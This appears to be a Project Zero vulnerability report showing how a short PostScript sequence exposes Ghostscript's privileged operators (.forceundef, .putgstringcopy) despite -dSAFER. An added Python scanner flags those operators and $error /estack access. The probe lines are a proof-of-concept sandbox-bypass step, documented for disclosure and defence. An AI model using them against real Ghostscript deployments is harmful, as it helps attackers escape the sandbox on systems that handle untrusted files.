ghostscript: .loadfontloop exposes system operators in saved execution stack.

While testing the fix for bug 1690 (ghostscript: $error object can expose system operators in saved execution stack, /p/project-zero/issues/detail?id=1690), I found a variation that still works:

$ ./gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>systemdict /.loadfontloop get stopped == clear
true
GS>$error /estack get 27 get 18 get 14 get ==
--.forceundef--
GS>

.forceundef is bad enough, but .putgstringcopy is also in there, which is basically a wrapper around .forceput.
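As a defender-side addition (not part of the original report), the following heuristic scanner flags PostScript inputs that reference the Ghostscript-internal operators named above or read the saved execution stack via `$error /estack`; the operator list comes only from this report and the sample input is constructed.

```python
"""Heuristic scanner for PostScript inputs that poke at Ghostscript internals.

Added example, not part of the original report. It flags the constructs the
report relies on: reading the saved execution stack out of $error, and
references to Ghostscript-private operators (.forceundef, .putgstringcopy,
.forceput, .loadfontloop). The operator list is only what the report names.
"""
import re

# Ghostscript-internal (dot-prefixed) operators named in the report. Ordinary
# application-generated PostScript has no reason to reference these.
SENSITIVE_OPERATORS = {".forceundef", ".forceput", ".putgstringcopy", ".loadfontloop"}

_STRING_RE = re.compile(r"\((?:[^()\\]|\\.)*\)")   # flat (...) string literals
_COMMENT_RE = re.compile(r"%.*")                     # '%' to end of line
_NAME_RE = re.compile(r"/?[A-Za-z$.][A-Za-z0-9$._-]*")  # executable or literal names


def scan_postscript(text):
    """Return (line_number, reason) findings for suspicious tokens in `text`."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        # Blank out string literals first so a '%' inside (...) is not a comment.
        line = _COMMENT_RE.sub("", _STRING_RE.sub("()", raw))
        names = [n.lstrip("/") for n in _NAME_RE.findall(line)]
        for name in names:
            if name in SENSITIVE_OPERATORS:
                findings.append((lineno, "Ghostscript-internal operator " + name))
        # $error introspection together with the estack key is how the saved
        # execution stack (and the operators left on it) is reached.
        if "$error" in names and "estack" in names:
            findings.append((lineno, "reads saved execution stack via $error /estack"))
    return findings


# Constructed sample: a benign line, then the two probes from the report.
SAMPLE = """%!PS
/Helvetica findfont 12 scalefont setfont (harmless 100% text) show
systemdict /.loadfontloop get stopped == clear
$error /estack get 27 get 18 get 14 get ==
"""

if __name__ == "__main__":
    for lineno, reason in scan_postscript(SAMPLE):
        print(f"line {lineno}: {reason}")
```

Nested parentheses inside string literals are not handled, so a match is a reason to quarantine and inspect, not a verdict.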

Filed upstream as https://bugs.ghostscript.com/show_bug.cgi?id=699938

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: taviso